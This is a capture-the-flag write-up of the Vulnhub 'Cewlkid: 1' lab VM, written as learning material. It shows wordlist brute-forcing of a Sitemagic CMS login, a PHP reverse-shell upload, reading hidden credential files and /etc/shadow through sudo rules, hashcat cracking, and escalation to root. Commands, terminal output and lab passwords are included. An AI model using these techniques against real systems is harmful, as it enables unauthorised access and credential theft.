Vulnhub - Cewlkid: 1
Introduction
An intermediate boot2root.
The name is a hint.
The start is CTF but the end is real world and worth the effort.
Created in Virtualbox.
Goal: Get the root flag.
Real world eh? Sounds interesting. Let’s see what we’ve got…
Ports
We’ve got SSH and two HTTP ports: 80 and 8080. There’s nothing on 80; it’s all on 8080.
CMS
The webserver on 8080 is running the Sitemagic CMS, which has default credentials of admin:admin. These don’t work.
After a bunch of enumeration turns up nothing, it’s time to actually pay attention to the hint and run cewl to generate a wordlist from the site contents. Once we’ve done that we run it through Burp Turbo Intruder and learn that the admin password is Letraset.
POST /index.php?SMExt=SMLogin HTTP/1.1
Host: 192.168.1.85:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.85:8080/index.php?SMExt=SMLogin
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: keep-alive
Cookie: SMSESSION6b631023323ea9ab=5pkean88dt4q0kji6fkdhim3qv
Upgrade-Insecure-Requests: 1
SMInputSMLoginUsername=admin&SMInputSMLoginPassword=Letraset&SMOptionListSMLoginLanguages%5B%5D=en&SMInputSMSearchValue8477222=&SMPostBackControl=SMLinkButtonSMLoginSubmit&SMRequestToken=995bbfdd8b62cb2eef0bc7998dc8f01bNow what?
Well, according to exploit-db we can upload arbitrary files, which includes any old PHP reverse shell. In fact the maker seems to have left one on the box already, but it has a different IP to mine so I had to make my own. Well, pentestmonkey made it for me, but you get the idea. We upload it and execute, we’re in.
Whether or not this is actually an ‘exploit’ or a deliberate design choice by the CMS maker is not clear to me, but I guess it doesn’t really matter.
On the box
Looking at /etc/passwd we have a few different users, and in running sudo -l we find our user (www-data) can run cat as user ipsum. So maybe ipsum has something for us?
Yes actually. Running:
www-data@cewlkid:/$ find . -user ipsum > /tmp/files 2>/dev/nullbrings us to an interesting looking file, and when we read it:
www-data@cewlkid:/tmp$ sudo -u ipsum /usr/bin/cat /var/www/example.com/html/.../nothing_to_see_here
aXBzdW0gOiBTcGVha1Blb3BsZTIyIQo=
bG9yZW0gOiBQZW9wbGVTcGVhazQ0IQo=So what’s that about? It’s base64, and decodes to:
ipsum : SpeakPeople22!
lorem : PeopleSpeak44!
Great, so now we’ve got two users with passwords, and we can SSH in and su between them at will.
Now what? Well, one of our users (lorem) has been set up in /etc/sudoers to read /etc/shadow with base64, which we again learn by running sudo -l. So … we can simply decode the base64 and now we have the shadow file. So that’s all well and good, but surely it’s more on the CTF end of the spectrum than the real world end?
Anyway, moving on. We can crack the hash for yet another user (zerocewl) using our wordlist that we gathered earlier using cewl:
.\hashcat64.exe -m 1800 .\hash.txt .\words.txt .\rules\best64.rule
Note: I ran hashcat on my Windows host rather than on Kali. I probably didn’t need to include the rules but I did anyway; it was a short wordlist.
Now we have another set of creds:
zerocewl:PageMaker
Privesc
When we run linpeas we can see this in the processes:
root 1994 0.0 0.8 27088 8256 ? S 10:26 0:00 /root/pth-toolkit-master/bin/winexe -U cewlbeans%fondateurs //kali whoami **
Is that a another password? Why yes, yes it is.
zerocewl@cewlkid:~$ su cewlbeans
Password: fondateurs
cewlbeans@cewlkid:/home/zerocewl$ sudo -l
[sudo] password for cewlbeans:
Matching Defaults entries for cewlbeans on cewlkid:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User cewlbeans may run the following commands on cewlkid:
(ALL : ALL) ALL
cewlbeans@cewlkid:/home/zerocewl$ sudo su
root@cewlkid:/home/zerocewl# cd /root
root@cewlkid:~# ls -lash
total 48K
4.0K drwx------ 6 root root 4.0K Sep 10 21:41 .
4.0K drwxr-xr-x 21 root root 4.0K Sep 9 12:11 ..
0 lrwxrwxrwx 1 root root 9 Sep 9 15:59 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
4.0K -rw------- 1 root root 92 Sep 9 22:53 .lesshst
4.0K drwxr-xr-x 3 root root 4.0K Sep 8 23:09 .local
4.0K -rw-r--r-- 1 root root 161 Dec 5 2019 .profile
4.0K drwxr-xr-x 5 root root 4.0K Sep 9 23:44 pth-toolkit-master
4.0K -rw-r--r-- 1 root root 2.0K Sep 10 21:41 root.txt
4.0K -rw-r--r-- 1 root root 66 Sep 9 17:35 .selected_editor
4.0K drwxr-xr-x 3 root root 4.0K Sep 7 23:42 snap
4.0K drwx------ 2 root root 4.0K Sep 7 23:42 .ssh
4.0K -rw-r--r-- 1 root root 209 Sep 9 16:12 .wget-hsts
root@cewlkid:~# cat root.txt
**ASCII graphic removed**
RmxhZwo=
root@cewlkid:~# echo 'RmxhZwo=' | base64 -d
FlagWell, I guess that’s that then.
Final thoughts
When we’re root we can read /etc/sudoers and it looks like this:
www-data ALL=(ipsum:ipsum) NOPASSWD:/usr/bin/cat
lorem ALL=(root:root) NOPASSWD:/usr/bin/base64 /etc/shadow
zerocewl ALL=(root:root) NOPASSWD:/usr/bin/cp /home/zerocewl/hosts /etc/hosts cewlbeans ALL=(ALL:ALL) ALL
Okay, now I’ve never worked as a Linux sysadmin but it’s not entirely clear to me which part of this is supposed to be particularly real world. Anyway it was still fun, so thanks iamv1nc3nt.